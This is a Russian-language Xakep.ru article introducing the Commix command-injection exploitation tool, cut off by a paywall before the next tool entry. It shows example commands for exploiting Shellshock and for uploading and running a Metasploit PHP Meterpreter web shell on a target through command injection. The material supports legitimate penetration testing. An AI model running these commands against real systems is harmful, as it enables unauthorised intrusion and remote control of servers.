Commix

Автор: Anastasios Stasinopoulos
URL: https://github.com/stasinopoulos/commix
Система: Linux/Mac/Windows

Commix (сокращение от [comm]and [i]njection e[x]ploiter) — это небольшое, простое окружение на Python, которое может быть использовано веб-разработчиками, пентестерами и исследователями безопасности для тестирования веб-приложений на наличие багов, ошибок или уязвимостей, связанных с атаками класса инъекции команд. Для запуска программы необходим Python строго версий 2.6 или 2.7. Скачиваем commix:

# git clone https://github.com/stasinopoulos/commix.git commix

Пример эксплуатации CVE-2014-6271/Shellshock:

# python commix.py --url="http://192.168.178.4/cgi-bin/status/" --shellshock

Больше примеров использования инструмента можно посмотреть здесь.

Commix также позволяет сразу заливать веб-шеллы на целевой хост, например Metasploit PHP Meterpreter, заранее сгенерированный с помощью msfvenom:

# python commix.py --url="http://192.168.178.4/cmd/normal.php?addr=INJECT_HERE" --file-write="/root/Desktop/msfvenom.php" --file-dest="/var/www/msfvenom.php" --os-cmd="php -f /var/www/msfvenom.php"

Уже сейчас инструмент есть в репозиториях для ArchAssault, BlackArch и предустановлен в The Penetration Testers Framework (PTF), PentestBox.

 

IVRE/DRUNK

Авторы: CEA IT Security
URL: https://github.com/cea-sec/ivre
Система: Windows/Linux

Продолжение доступно только участникам

Вариант 1. Присоединись к сообществу «Xakep.ru», чтобы читать все материалы на сайте

Членство в сообществе в течение указанного срока откроет тебе доступ ко ВСЕМ материалам «Хакера», увеличит личную накопительную скидку и позволит накапливать профессиональный рейтинг Xakep Score! Подробнее

Вариант 2. Открой один материал

Заинтересовала статья, но нет возможности стать членом клуба «Xakep.ru»? Тогда этот вариант для тебя! Обрати внимание: этот способ подходит только для статей, опубликованных более двух месяцев назад.


Check Also

В королевстве PWN. Препарируем классику переполнения буфера в современных условиях

Сколько раз и в каких только контекстах не писали об уязвимости переполнения буфера! Однак…

1 комментарий

  1. Аватар

    0ri0n

    16.08.2015 at 16:32

    Generate-Macro
    Есть аналоги? На повер шел не айс. Поскольку после запуска максимум что удалось, Это создать какойто другой повершел скрипт. который не делает не чего

Оставить мнение